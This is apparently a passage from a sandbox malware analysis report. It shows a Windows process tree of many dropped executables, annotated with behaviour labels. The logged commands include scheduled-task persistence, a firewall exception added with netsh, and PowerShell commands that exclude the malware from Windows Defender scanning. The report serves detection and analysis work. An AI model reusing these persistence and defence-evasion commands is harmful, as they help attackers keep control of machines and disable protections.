C:\Users\Admin\AppData\Roaming\FvPeQhIfo6.exe"C:\Users\Admin\AppData\Roaming\FvPeQhIfo6.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3420
-
-
C:\Users\Admin\AppData\Roaming\YpJU1SdRN0.exe"C:\Users\Admin\AppData\Roaming\YpJU1SdRN0.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:4220
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe"C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4072
-
-
C:\Users\Admin\AppData\Local\Temp\Files\w.exe"C:\Users\Admin\AppData\Local\Temp\Files\w.exe"3⤵
- Executes dropped EXE
PID:3960
-
-
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"3⤵
- Executes dropped EXE
PID:1284 -
C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"C:\Users\Admin\AppData\Local\Temp\Files\DiscordSpotifyBypass.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:328
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\built.exe"C:\Users\Admin\AppData\Local\Temp\Files\built.exe"3⤵
- Executes dropped EXE
PID:4832 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\built.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3344
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3412 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1zEIBHtViAMV.bat" "5⤵PID:1112
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:2444
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1740
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4440 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:1676
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1OEpgI8cNZZp.bat" "7⤵PID:1668
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:4508
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3584
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2848 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:5016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Dim1P73zFbfQ.bat" "9⤵PID:1748
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:1624
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3416
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3924 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:3680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1CFhkz8SxG0Q.bat" "11⤵PID:4656
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:1524
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2440
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4300 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:4868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KSCE3JBRYd2w.bat" "13⤵PID:932
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:1976
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4620
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2320 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:2432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QDvzE7fy3V99.bat" "15⤵PID:2848
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:1492
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4280
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2592 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:3136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qcG0B5fWM2Kp.bat" "17⤵PID:4604
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:4764
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2492
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4828 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:1656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZyT8xENVOTWD.bat" "19⤵PID:3924
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:3728
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3756
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2968 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:3012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7P5mQdWx91Hz.bat" "21⤵PID:4468
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:4612
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1524
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"22⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1716 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:3892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RAkrmuQPQn9V.bat" "23⤵PID:4572
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:4740
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3676
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2188 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:4624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xMLPDGyJfkhk.bat" "25⤵PID:1848
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:2520
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1948
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"26⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:752 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:3344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ecx3iWk012y7.bat" "27⤵PID:2980
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:2976
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1592
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"28⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5096 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:2608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\X9znXVNGb9Sh.bat" "29⤵PID:3768
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:1948
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2288
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"30⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2764 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
PID:3060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iQKrJfeTOwmK.bat" "31⤵PID:1492
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:4848
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3760
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"32⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5888 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f33⤵
- Scheduled Task/Job: Scheduled Task
PID:5920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zB6CSBfBQyIS.bat" "33⤵PID:6028
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:6088
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6108
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"34⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2400 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f35⤵
- Scheduled Task/Job: Scheduled Task
PID:5040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1iytKINj1YAv.bat" "35⤵PID:2936
-
C:\Windows\system32\chcp.comchcp 6500136⤵PID:1836
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2316
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"36⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:700 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f37⤵
- Scheduled Task/Job: Scheduled Task
PID:2900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ONFIIb2W1Pb9.bat" "37⤵PID:5152
-
C:\Windows\system32\chcp.comchcp 6500138⤵PID:5240
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost38⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5252
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"38⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5440 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f39⤵
- Scheduled Task/Job: Scheduled Task
PID:5472
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\89RWZsruzKro.bat" "39⤵PID:5592
-
C:\Windows\system32\chcp.comchcp 6500140⤵PID:5640
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost40⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5356
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"40⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3080 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f41⤵
- Scheduled Task/Job: Scheduled Task
PID:4960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YaN2OlYpXMsJ.bat" "41⤵PID:2732
-
C:\Windows\system32\chcp.comchcp 6500142⤵PID:5236
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost42⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5396
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"42⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2096 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f43⤵
- Scheduled Task/Job: Scheduled Task
PID:5592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8EQFTb4doBXq.bat" "43⤵PID:2544
-
C:\Windows\system32\chcp.comchcp 6500144⤵PID:5280
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost44⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5148
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"44⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:6140 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f45⤵
- Scheduled Task/Job: Scheduled Task
PID:3684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wgywlNOzwy9o.bat" "45⤵PID:5348
-
C:\Windows\system32\chcp.comchcp 6500146⤵PID:1976
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost46⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2968
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"46⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:5552 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f47⤵
- Scheduled Task/Job: Scheduled Task
PID:1688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ou73wzZ3ih8R.bat" "47⤵PID:2364
-
C:\Windows\system32\chcp.comchcp 6500148⤵PID:5388
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost48⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5136
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"48⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3168 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f49⤵
- Scheduled Task/Job: Scheduled Task
PID:4276
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Eh9kkNx3Alx9.bat" "49⤵PID:6024
-
C:\Windows\system32\chcp.comchcp 6500150⤵PID:5040
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost50⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3032
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"50⤵PID:3732
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe"C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe"3⤵
- Executes dropped EXE
PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5048 -
C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"4⤵
- Executes dropped EXE
PID:3020
-
-
C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"C:\Users\Admin\AppData\Local\Temp\Files\yxrd0ob7.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 2884⤵
- Program crash
PID:4712
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe"C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1588 -
C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:436 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" "Runtime Broker.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Time Discovery
PID:1668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\System.exe"C:\Users\Admin\AppData\Local\Temp\Files\System.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1464
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win32-setup-unsigned.exe"C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win32-setup-unsigned.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test10.exe"C:\Users\Admin\AppData\Local\Temp\Files\test10.exe"3⤵
- Executes dropped EXE
PID:3036
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Server.exe"C:\Users\Admin\AppData\Local\Temp\Files\Server.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:3184
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NoMoreRansom.exe"C:\Users\Admin\AppData\Local\Temp\Files\NoMoreRansom.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1676
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"C:\Users\Admin\AppData\Local\Temp\Files\Eszop.exe"3⤵
- Executes dropped EXE
PID:3204
-
-
C:\Users\Admin\AppData\Local\Temp\Files\LicenseMalwareBytes.exe"C:\Users\Admin\AppData\Local\Temp\Files\LicenseMalwareBytes.exe"3⤵
- Executes dropped EXE
PID:5296 -
C:\Users\Admin\AppData\Local\Temp\Files\LicenseMalwareBytes.exe"C:\Users\Admin\AppData\Local\Temp\Files\LicenseMalwareBytes.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:5644 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵PID:5676
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵PID:5692
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe"C:\Users\Admin\AppData\Local\Temp\Files\zzzz1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5844 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\major.exe"C:\Users\Admin\AppData\Local\Temp\Files\major.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1928
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5960
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"3⤵
- Executes dropped EXE
PID:3864 -
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:2900 -
